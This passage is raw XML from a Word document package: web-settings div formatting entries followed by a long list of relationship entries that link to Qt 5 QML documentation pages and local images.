        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2090076918">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="423768064">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2119521740">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1142651862">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="3643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26041">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2143846018">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1811046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hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-connections.html" TargetMode="External"/><Relationship Id="rId1827" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlesystem.html" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2089" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId2296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtsensors-index.html" TargetMode="External"/><Relationship Id="rId682" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtglobal.html" TargetMode="External"/><Relationship Id="rId2156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometry.html" TargetMode="External"/><Relationship Id="rId2363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-layouts.html" TargetMode="External"/><Relationship Id="rId2570" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-date.html" TargetMode="External"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-tutorials-extending-qml-example.html" TargetMode="External"/><Relationship Id="rId542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-controls-styles-qmlmodule.html" TargetMode="External"/><Relationship Id="rId987" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-huesaturation.html" TargetMode="External"/><Relationship Id="rId1172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-place.html" TargetMode="External"/><Relationship Id="rId2016" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qt.html" TargetMode="External"/><Relationship Id="rId2223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-signals.html" TargetMode="External"/><Relationship Id="rId2430" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId2668" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-convenience-topic.html" TargetMode="External"/><Relationship Id="rId2875" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-topic.html" TargetMode="External"/><Relationship Id="rId847" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-core-component3d.html" TargetMode="External"/><Relationship Id="rId1032" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-keynavigation.html" TargetMode="External"/><Relationship Id="rId1477" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-xyseries.html" TargetMode="External"/><Relationship Id="rId1684" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId1891" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId2528" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-sprite.html" TargetMode="External"/><Relationship Id="rId2735" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-objecttypes.html" TargetMode="External"/><Relationship Id="rId2942" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-signals.html" TargetMode="External"/><Relationship Id="rId707" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-accessible.html" TargetMode="External"/><Relationship Id="rId914" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-core-entity.html" TargetMode="External"/><Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-surface3dseries.html" TargetMode="External"/><Relationship Id="rId1544" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1751" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId1989" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometrynode.html" TargetMode="External"/><Relationship Id="rId2802" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qpainter.html" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId1404" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtpurchasing-transaction.html" TargetMode="External"/><Relationship Id="rId1611" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlmodule.html" TargetMode="External"/><Relationship Id="rId1849" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-trailemitter.html" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-exposecppattributes.html" TargetMode="External"/><Relationship Id="rId1709" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId1916" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2080" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-shadereffectsource.html" TargetMode="External"/><Relationship Id="rId2178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-text.html" TargetMode="External"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-propertybinding.html" TargetMode="External"/><Relationship Id="rId1194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-pressuresensor.html" TargetMode="External"/><Relationship Id="rId2038" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-scenegraph-customgeometry-example.html" TargetMode="External"/><Relationship Id="rId2592" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-cppmodels.html" TargetMode="External"/><Relationship Id="rId2897" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcomponent.html" TargetMode="External"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-module.html" TargetMode="External"/><Relationship Id="rId771" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-busyindicator.html" TargetMode="External"/><Relationship Id="rId869" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-customparticle.html" TargetMode="External"/><Relationship Id="rId1499" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId2245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/declarative-qmlfocus1.png" TargetMode="External"/><Relationship Id="rId2452" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-springanimation.html" TargetMode="External"/><Relationship Id="rId424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-topic.html" TargetMode="External"/><Relationship Id="rId631" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId729" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-animationcontroller.html" TargetMode="External"/><Relationship Id="rId1054" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-loader.html" TargetMode="External"/><Relationship Id="rId1261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-sceneloader.html" TargetMode="External"/><Relationship Id="rId1359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwinextras-taskbarbutton.html" TargetMode="External"/><Relationship Id="rId2105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickwindow.html" TargetMode="External"/><Relationship Id="rId2312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId2757" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2964" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-usecase-layouts.html" TargetMode="External"/><Relationship Id="rId936" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-fontloader.html" TargetMode="External"/><Relationship Id="rId1121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-number.html" TargetMode="External"/><Relationship Id="rId1219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-radiodata.html" TargetMode="External"/><Relationship Id="rId1566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1773" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-stacklayout.html" TargetMode="External"/><Relationship Id="rId1980" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgtransformnode.html" TargetMode="External"/><Relationship Id="rId2617" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId2824" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometry-texturedpoint2d.html" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-functionlist.html" TargetMode="External"/><Relationship Id="rId1426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-vcandlestickmodelmapper.html" TargetMode="External"/><Relationship Id="rId1633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId1840" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-itemparticle.html" TargetMode="External"/><Relationship Id="rId1700" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1938" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlmodule.html" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-modules-topic.html" TargetMode="External"/><Relationship Id="rId3013" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtglobal.html" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-typesystem-topic.html" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlcomponent.html" TargetMode="External"/><Relationship Id="rId586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-itemparticle.html" TargetMode="External"/><Relationship Id="rId793" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-cameraselector.html" TargetMode="External"/><Relationship Id="rId2267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/declarative-qmlfocus5.png" TargetMode="External"/><Relationship Id="rId2474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-animations.html" TargetMode="External"/><Relationship Id="rId2681" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-connections.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qmlreference.html" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId653" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-listmodel.html" TargetMode="External"/><Relationship Id="rId1076" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-maskshape.html" TargetMode="External"/><Relationship Id="rId1283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-shifthandler.html" TargetMode="External"/><Relationship Id="rId1490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-loader.html" TargetMode="External"/><Relationship Id="rId2127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId2779" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textinput.html" TargetMode="External"/><Relationship Id="rId2986" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/compatmap.html" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-qmldir.html" TargetMode="External"/><Relationship Id="rId860" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-coordinate.html" TargetMode="External"/><Relationship Id="rId958" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-goochmaterial.html" TargetMode="External"/><Relationship Id="rId1143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlesystem.html" TargetMode="External"/><Relationship Id="rId1588" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-xmllistmodel-qmlmodule.html" TargetMode="External"/><Relationship Id="rId1795" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-dialog.html" TargetMode="External"/><Relationship Id="rId2541" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-statesanimations-states.html" TargetMode="External"/><Relationship Id="rId2639" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-delegatemodel.html" TargetMode="External"/><Relationship Id="rId2846" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgtexturematerial.html" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-component.html" TargetMode="External"/><Relationship Id="rId513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-propertybinding.html" TargetMode="External"/><Relationship Id="rId720" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-ambienttemperaturereading.html" TargetMode="External"/><Relationship Id="rId818" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-changelanguagekey.html" TargetMode="External"/><Relationship Id="rId1350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-tabbutton.html" TargetMode="External"/><Relationship Id="rId1448" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebchannel-webchannel.html" TargetMode="External"/><Relationship Id="rId1655" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId2401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-visualcanvas-scenegraph.html" TargetMode="External"/><Relationship Id="rId2706" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-objectattributes.html" TargetMode="External"/><Relationship Id="rId1003" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-int.html" TargetMode="External"/><Relationship Id="rId1210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtpositioning-qtpositioning.html" TargetMode="External"/><Relationship Id="rId1308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-spritegoal.html" TargetMode="External"/><Relationship Id="rId1862" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-angledirection.html" TargetMode="External"/><Relationship Id="rId2913" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId1515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId1722" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId2191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-input-topic.html" TargetMode="External"/><Relationship Id="rId3035" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qtcreator/images/qml-observer-context-menu.png" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickview.html" TargetMode="External"/><Relationship Id="rId2051" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId2289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-regexpvalidator.html" TargetMode="External"/><Relationship Id="rId2496" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pauseanimation.html" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId468" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId675" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtglobal.html" TargetMode="External"/><Relationship Id="rId882" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-extras-dial.html" TargetMode="External"/><Relationship Id="rId1098" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt-labs-platform-messagedialog.html" TargetMode="External"/><Relationship Id="rId2149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qcolor.html" TargetMode="External"/><Relationship Id="rId2356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-column.html" TargetMode="External"/><Relationship Id="rId2563" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId2770" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mousearea.html" TargetMode="External"/><Relationship Id="rId328" 